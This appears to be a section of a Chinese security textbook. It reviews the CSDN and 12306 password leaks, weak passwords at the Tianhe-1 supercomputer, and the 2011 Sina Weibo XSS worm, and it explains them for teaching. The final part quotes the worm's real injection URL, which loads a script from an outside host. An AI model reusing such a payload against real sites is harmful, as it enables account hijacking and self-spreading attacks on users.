2.3　安全事件敲响警钟

2.3.1　 CSDN事件

2011年12月21日上午，有骇客在网上披露CSDN数据库泄露，并提供了下载地址，高达600余万个注册邮箱与密码泄露，并且所有密码都使用明文储存。CSDN是国内最大的以程序员为核心的大型网站，却采用明文储存用户密码（当时即便是小型BBS网站数据库都采用MD5等方式对密码加密）。

21日晚，CSDN发布声明并道歉。据CSDN官方解释，该数据库为CSDN作为备份所用，CSDN在2009年4月之前是以明文保存密码，而泄漏原因不详。

继CSDN的数据库泄漏之后，天涯社区、世纪佳缘、开心网等十余家国内知名网站的近5000万用户信息陆续在网上被人公布，各大社区的信誉也遭受质疑。当然，这次严重的事故同时也提高了国内对网络信息安全的重视。

2.3.2　 12306事件

2014年12月25上午，乌云漏洞报告平台上出现了一则标题为“大量12306用户数据在互联网疯传，包括用户账号、明文密码、身份证号码、邮箱等（泄漏途径目前未知）”的新闻，缺陷编号为：WooYun-2014-88532。这可让网上一下炸了锅，各种讨论与分析瞬间出炉，根据对泄漏数据的分析及当晚的官方信息，这次事件极有可能是一次“撞库攻击”。那么何谓“撞库”？就拿刚才提到的CSDN数据泄露来说，攻击者如果用这些泄露的数据尝试登录12306网站，或是编写脚本进行大量登录测试，就叫撞库攻击。然而被泄露的数据远不止CSDN这么多，量变引起质变，多米诺骨牌效应导致了大量数据的泄露。

2.3.3　 “天河”超级计算机事件

2015年2月12日，又一个神奇的漏洞引起了广泛关注，这个漏洞竟然出现在超级计算机天河一号上，着实令人震惊（图2-4）。但是仔细一看漏洞细节，却又让人啼笑皆非：天河一号的办公环境有一个未加密的无线网络，任何设备都可以轻易接入，直接进入内网。这位白帽子小黑客顺便找了找其他可能存在的漏洞，这一找可不得了，他发现天河一号超级计算机内部存在大量弱口令，以及部分服务器存在破壳漏洞（即bash漏洞，一个十分严重的Linux漏洞）。

图2-4　天河一号漏洞信息

回顾以上列举的3个典型安全事件，其都与密码安全息息相关，也正好对应了密码安全中3个“过不去的坎”：明文存储、撞库（同一密码多用）和弱口令。更多关于密码安全的知识，请见附录。

2.3.4　新浪微博XSS蠕虫事件

2011年6月28日晚，中国大型SNS网站——新浪网的新浪微博业务遭受XSS蠕虫攻击。中招的微博博主会自动通过广播和私信的方式发布一些诱惑性信息，用户单击链接后便会触发XSS，发布同样的信息并自动关注hellosamy，中招的用户单击后又会触发XSS，蠕虫便如链式反应般传播。由于蠕虫的指数爆炸型传播、微博的分享形式以及一些大V认证的用户被攻击，该蠕虫在16分钟内就感染了30 000名以上用户，可以说是近几年中国SNS社区受到的最大的一次攻击。

这次攻击并没有直接造成用户的重大损失，更像是一场黑客的恶作剧（从收听的hellosamy用户也能看出，Samy是XSS蠕虫鼻祖herosamy的作者，他的XSS蠕虫曾造成社交网站MySpace的瘫痪）。但同样，这次事件也提高了公众对信息安全的关注（随后新浪多处反射型XSS被披露）。而这次漏洞成因更让人大跌眼镜：新浪对该参数竟然完全没有过滤！这次攻击在Chrome、Safari中会被XSS Filter拦截，而IE、Firefox未能幸免，根据当时IE、Firefox的市场占有率，这的确是一次范围很广的攻击。

让我们来分析一下这个被用来传播XSS蠕虫的URL：

    http://weibo.com/pub/star/g/xyyyd”><script src=//www.2kt.cn/images/
t.js></script>?type=update

在访问这个URL时，新浪会对字符串进行处理，结果变成了访问：

    http://weibo.com/pub/star.php?g=xyyyd”><script src=//www.2kt.cn/
images/t.js></script>?type=update

由于参数g并没有进行应有的过滤，导致这个来自外部的JS脚本被嵌入页面内。